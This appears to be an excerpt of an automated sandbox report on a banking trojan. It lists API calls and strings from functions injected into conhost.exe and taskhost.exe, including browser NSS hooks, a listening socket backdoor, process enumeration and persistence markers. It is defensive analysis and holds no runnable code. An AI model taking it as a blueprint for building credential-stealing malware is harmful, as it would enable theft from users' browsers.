Part of subcall function 000C31CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 000C3271
Part of subcall function 000C31CC: CloseHandle.KERNEL32(00000000), ref: 000C328E
Part of subcall function 000C31CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 000C32A1
Part of subcall function 000C31CC: CloseHandle.KERNEL32(?), ref: 000C330E
Part of subcall function 000C31CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 000C331A
Part of subcall function 000C31CC: CloseHandle.KERNEL32(000001E6), ref: 000C332B

WaitForSingleObject.KERNEL32(00001388), ref: 000BBBBD

Part of subcall function 000C6B8E: ReleaseMutex.KERNEL32(00000000,000C3021,?,?,?), ref: 000C6B92

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C6B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 000C6B4A
DispatchMessageW.USER32(?), ref: 000C6B55
PeekMessageW.USER32(00000000), ref: 000C6B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000C6B79

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C4A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000C4A3D
Thread32First.KERNEL32(00000000,?), ref: 000C4A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 000C4A6E
CloseHandle.KERNEL32(00000000), ref: 000C4A79

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C040D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217

APIs

Part of subcall function 000C6973: getsockname.WS2_32(?,?,?), ref: 000C6991

Part of subcall function 000C636E: recv.WS2_32(?,?,00000004,00000000), ref: 000C6392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 000C04DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 000C0515

Part of subcall function 000C64FD: socket.WS2_32(00000000,00000001,00000006), ref: 000C6506
Part of subcall function 000C64FD: bind.WS2_32(00000000,?,-0000001D), ref: 000C6526
Part of subcall function 000C64FD: listen.WS2_32(00000000,?), ref: 000C6535
Part of subcall function 000C64FD: #3.WS2_32(00000000), ref: 000C6540

Part of subcall function 000C672E: accept.WS2_32(00000000,00000000,00000001), ref: 000C6754

Part of subcall function 000C6403: socket.WS2_32(?,00000001,00000006), ref: 000C640C
Part of subcall function 000C6403: connect.WS2_32(00000000,?,-0000001D), ref: 000C642C
Part of subcall function 000C6403: #3.WS2_32(00000000,?,?,?,000B7518,?), ref: 000C6437

Part of subcall function 000C67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000C67CC

Part of subcall function 000C65B7: recv.WS2_32(?,?,00000400,00000000), ref: 000C6600
Part of subcall function 000C65B7: #19.WS2_32(?,?,00000000,00000000), ref: 000C661A
Part of subcall function 000C65B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 000C6657

Part of subcall function 000C675E: shutdown.WS2_32(?,00000002), ref: 000C6766
Part of subcall function 000C675E: #3.WS2_32(?), ref: 000C676D

Part of subcall function 000C0397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 000C03BB
Part of subcall function 000C0397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 000C03CA

Strings

Z, xrefs: 000C064F

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 000C46F4: GetTickCount.KERNEL32(000C8766,?), ref: 000C46F4

CharUpperW.USER32(00000000), ref: 000C785B

Strings

bcdfghklmnpqrstvwxz, xrefs: 000C7759
.exe, xrefs: 000C7745

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CD64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 000CD664

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

GetSystemTime.KERNEL32(?), ref: 000CD6B0

Part of subcall function 000CD42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,000CD581,?,?,00000000), ref: 000CD43F

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Strings

.txt, xrefs: 000CD746

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B7EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(000B16C0,00000000,00004401,000B16D0,?), ref: 000B7F29
CoCreateInstance.OLE32(000B1690,00000000,00004401,000B16A0,?), ref: 000B7F7C

Strings

D, xrefs: 000B7FA7

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BA579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 000BA5C9

Part of subcall function 000C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 000C8B23
Part of subcall function 000C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000C8B4A
Part of subcall function 000C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 000C8B94
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 000C8BC1
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 000C8BF1
Part of subcall function 000C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 000C8C1F
Part of subcall function 000C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 000C8C31

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

&, xrefs: 000BA59F
#, xrefs: 000BA5AD

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B9C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 000B9CA8

Part of subcall function 000C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 000C8B23
Part of subcall function 000C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000C8B4A
Part of subcall function 000C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 000C8B94
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 000C8BC1
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 000C8BF1
Part of subcall function 000C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 000C8C1F
Part of subcall function 000C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 000C8C31

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

&, xrefs: 000B9C7E
#, xrefs: 000B9C8C

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C2B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 000C2B1F
GetProcAddress.KERNEL32(00000000,?), ref: 000C2B41

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

0x01D9C0A0, xrefs: 000C2B63

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C8737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 000C874E

Part of subcall function 000C46F4: GetTickCount.KERNEL32(000C8766,?), ref: 000C46F4

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

Part of subcall function 000C856B: CreateFileW.KERNEL32(000C4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 000C8585
Part of subcall function 000C856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000C85A8
Part of subcall function 000C856B: CloseHandle.KERNEL32(00000000), ref: 000C85B5

Strings

%s%08x.%s, xrefs: 000C876C
tmp, xrefs: 000C8767

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C6F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 000C6FB1

Part of subcall function 000C8716: SetFileAttributesW.KERNEL32(00000080,00000080,000CB4CD,?), ref: 000C871F
Part of subcall function 000C8716: DeleteFileW.KERNEL32(?), ref: 000C8729

PathFindFileNameW.SHLWAPI(?), ref: 000C6FD3

Part of subcall function 000C353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,000C4232,00000000,00000000,00000000,000C3597,00000000,00000000,00000000,?,00000000), ref: 000C3555

Strings

cab, xrefs: 000C6FA6

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CC8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 000C6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08), ref: 000C6AC3
Part of subcall function 000C6AAA: GetLastError.KERNEL32(?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08,?,?,00000000), ref: 000C6AC9
Part of subcall function 000C6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08), ref: 000C6AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,000CC9FB,00000000,?,?,?), ref: 000CC8C6

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C4CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 000C4CEE
Part of subcall function 000C4CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 000C4D0D
Part of subcall function 000C4CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 000C4D19
Part of subcall function 000C4CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,000CC8F5,00000000,00000000,00000000,000CC8F5,000CC8F5,00000000,?,?,?,00000000,00000044), ref: 000C4D8A
Part of subcall function 000C4CDD: CloseHandle.KERNEL32(?), ref: 000C4D9D
Part of subcall function 000C4CDD: CloseHandle.KERNEL32(?), ref: 000C4DA2
Part of subcall function 000C4CDD: FreeLibrary.KERNEL32(?), ref: 000C4DB9

CloseHandle.KERNEL32(?), ref: 000CC907

Strings

"%s", xrefs: 000CC8DA

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C5484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 000C5403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 000C5414
Part of subcall function 000C5403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 000C5427
Part of subcall function 000C5403: FreeLibrary.KERNEL32(?), ref: 000C5479

GetTickCount.KERNEL32(?), ref: 000C54C9

Part of subcall function 000C52D1: WaitForSingleObject.KERNEL32(?,?), ref: 000C5325
Part of subcall function 000C52D1: Sleep.KERNEL32(?,?,?,00000000), ref: 000C5338
Part of subcall function 000C52D1: InternetCloseHandle.WININET(00000000), ref: 000C53BE

GetTickCount.KERNEL32(00000000), ref: 000C54DB

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

http://www.google.com/webhp, xrefs: 000C54A9

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BA2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

Part of subcall function 000C85D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 000C85F5
Part of subcall function 000C85D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8608
Part of subcall function 000C85D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8630
Part of subcall function 000C85D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 000C8648
Part of subcall function 000C85D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8662
Part of subcall function 000C85D0: CloseHandle.KERNEL32(?), ref: 000C866B

StrStrIA.SHLWAPI(?,?), ref: 000BA410
StrStrIA.SHLWAPI(?,?), ref: 000BA422
StrStrIA.SHLWAPI(?,?), ref: 000BA432
StrStrIA.SHLWAPI(?,?), ref: 000BA444

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C8678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,000CC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 000C8689
Part of subcall function 000C8678: CloseHandle.KERNEL32(?), ref: 000C8697

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

Part of subcall function 000C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 000C8B23
Part of subcall function 000C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000C8B4A
Part of subcall function 000C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 000C8B94
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 000C8BC1
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 000C8BF1
Part of subcall function 000C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 000C8C1F
Part of subcall function 000C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 000C8C31

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CAD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAD7C

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

LeaveCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAD9D
EnterCriticalSection.KERNEL32(000D3FB4,?,?,?,?,000CB052,?), ref: 000CADAE

Part of subcall function 000C3346: HeapAlloc.KERNEL32(00000008,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?,?), ref: 000C3368
Part of subcall function 000C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?), ref: 000C3379

LeaveCriticalSection.KERNEL32(000D3FB4,?,?,?,000CB052,?), ref: 000CAE47

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Analysis Process: taskhost.exe PID: 540 Parent PID: 3700

Executed Functions

Function 005120C4, Relevance: 49.2, APIs: 17, Strings: 11, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00512105
LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00512172
GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 005121A7
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 005121DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 005121FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0051220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0051221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00512230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00512242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00512254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0051228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 0051229C
InitializeCriticalSection.KERNEL32(0052400C,?,?,00000000), ref: 005122C9
WSAStartup.WS2_32(00000202,?), ref: 005122DF
CreateEventW.KERNEL32(00522C30,00000001,00000000,00000000,?,?,00000000), ref: 00512300

Part of subcall function 005149D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00512326,000000FF,00522C08,?,?,00000000), ref: 005149E2
Part of subcall function 005149D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00512326,000000FF,00522C08), ref: 00514A0E
Part of subcall function 005149D2: CloseHandle.KERNEL32(?), ref: 00514A23

GetLengthSid.ADVAPI32(00000000,000000FF,00522C08,?,?,00000000), ref: 00512335

Part of subcall function 00511E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00511E4B
Part of subcall function 00511E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00511E5A
Part of subcall function 00511E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00511E6E

GetCurrentProcessId.KERNEL32(00000000,022DF7D0,00000000,?,?,00000000), ref: 00512362

Part of subcall function 00511E8F: IsBadReadPtr.KERNEL32(?,?), ref: 00511EBD

Part of subcall function 00517A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00517AB5

Part of subcall function 00511F98: InitializeCriticalSection.KERNEL32(00523FB4,00000000,76C61857,00000000), ref: 00511FAF
Part of subcall function 00511F98: InitializeCriticalSection.KERNEL32(00522AC8), ref: 00511FE4
Part of subcall function 00511F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0051200C
Part of subcall function 00511F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00512029
Part of subcall function 00511F98: CloseHandle.KERNEL32(00000000), ref: 0051203A
Part of subcall function 00511F98: InitializeCriticalSection.KERNEL32(`9), ref: 00512081
Part of subcall function 00511F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00512093
Part of subcall function 00511F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 0051209E

Part of subcall function 00511EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00511F2C
Part of subcall function 00511EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 00511F56

Strings

LdrGetDllHandle, xrefs: 00512244
NtQueryInformationProcess, xrefs: 0051220E
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 005123AB
LdrLoadDll, xrefs: 00512232
GetProcAddress, xrefs: 0051211D
SOFTWARE\Microsoft\Xyuxy, xrefs: 005123F9
RtlUserThreadStart, xrefs: 00512220
LoadLibraryA, xrefs: 00512127
NtCreateUserProcess, xrefs: 005121FC
Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 005123F3
NtCreateThread, xrefs: 005121F4

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00511F98, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(00523FB4,00000000,76C61857,00000000), ref: 00511FAF
InitializeCriticalSection.KERNEL32(00522AC8), ref: 00511FE4

Part of subcall function 00512828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 005128A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0051200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00512029
CloseHandle.KERNEL32(00000000), ref: 0051203A

Part of subcall function 00519D6D: InitializeCriticalSection.KERNEL32(9,00000000,7718F8FF), ref: 00519D8F
Part of subcall function 00519D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 00519E63

Part of subcall function 0051B4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0051B4F0

InitializeCriticalSection.KERNEL32(`9), ref: 00512081

Part of subcall function 0050E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0050E108
Part of subcall function 0050E0FB: GetThreadDesktop.USER32(00000000), ref: 0050E10F
Part of subcall function 0050E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0050E128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00512093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 0051209E

Part of subcall function 0050C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,005120A9), ref: 0050C111
Part of subcall function 0050C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,005120A9), ref: 0050C125
Part of subcall function 0050C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0050C132
Part of subcall function 0050C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0050C13F
Part of subcall function 0050C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0050C14C

Strings

nspr4.dll, xrefs: 0051208E
`9, xrefs: 00512070
nss3.dll, xrefs: 00512099

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00504DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 00512507: CreateMutexW.KERNELBASE(00522C30,00000000,?,?,?,?,?), ref: 00512528

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 00504E28
CloseHandle.KERNEL32(?), ref: 00504F89

Part of subcall function 0050E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00504E69,?,?,?,743C152E,00000002), ref: 0050E97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00504EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 00504EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00504F1A

Part of subcall function 005167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 005167CC

Part of subcall function 00514DF0: CreateThread.KERNEL32(00000000,?,00000000,0050748F,00000000,0050748F), ref: 00514E04
Part of subcall function 00514DF0: CloseHandle.KERNEL32(00000000), ref: 00514E0F

accept.WS2_32(?,00000000,00000000), ref: 00504F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 00504F59

Part of subcall function 0051675E: shutdown.WS2_32(?,00000002), ref: 00516766
Part of subcall function 0051675E: #3.WS2_32(?,?,?,?), ref: 0051676D

CloseHandle.KERNEL32(?), ref: 00504F7A

Part of subcall function 00516B8E: ReleaseMutex.KERNEL32(00000000,00513021,?,?,?), ref: 00516B92

Part of subcall function 0050E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0050E8E0

Part of subcall function 00504C68: getsockname.WS2_32(?,?,?), ref: 00504CBE
Part of subcall function 00504C68: CloseHandle.KERNEL32(?), ref: 00504CE2

Strings

K2w, xrefs: 00504EC7

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 00512507: CreateMutexW.KERNELBASE(00522C30,00000000,?,?,?,?,?), ref: 00512528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 0050775B
SetThreadPriority.KERNEL32(00000000), ref: 00507762

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

WaitForSingleObject.KERNEL32(0000EA60), ref: 00507780

Part of subcall function 00519A9E: RegOpenKeyExW.ADVAPI32(80000001,00523EC0,00000000,00000001,?), ref: 00519ADD

CreateMutexW.KERNEL32(Function_00022C30,00000001,?,20000000), ref: 00507843
GetLastError.KERNEL32 ref: 00507853
CloseHandle.KERNEL32(00000000), ref: 00507861

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

Part of subcall function 00514DF0: CreateThread.KERNEL32(00000000,?,00000000,0050748F,00000000,0050748F), ref: 00514E04
Part of subcall function 00514DF0: CloseHandle.KERNEL32(00000000), ref: 00514E0F

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 00507919

Part of subcall function 00516B8E: ReleaseMutex.KERNEL32(00000000,00513021,?,?,?), ref: 00516B92

Strings

Global\%08X%08X%08X, xrefs: 0050781D

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005063F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 00512507: CreateMutexW.KERNELBASE(00522C30,00000000,?,?,?,?,?), ref: 00512528

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

Part of subcall function 00505ECF: PathRemoveFileSpecW.SHLWAPI(005225D0), ref: 00505F07
Part of subcall function 00505ECF: PathRenameExtensionW.SHLWAPI(?,.tmp), ref: 00505F23
Part of subcall function 00505ECF: GetFileAttributesW.KERNEL32(005223C8,005225D0,005225D0,?,?,00506527,00000000,?,00000000,00000330,?,?,00000102), ref: 00505F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 00506538
GetFileAttributesW.KERNEL32(005223C8), ref: 0050654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00506571
CloseHandle.KERNEL32(00000000), ref: 0050658F
lstrcmpiW.KERNEL32(?,?), ref: 005065BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 005065E7

Part of subcall function 00506BD7: RegOpenKeyExW.ADVAPI32(80000001,005227F0,00000000,00000001,?,?), ref: 00506C00

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 00506010: GetTickCount.KERNEL32(0000271B,00020000,?,00002719,00020000,?,?,00000000,00000000), ref: 0050610F
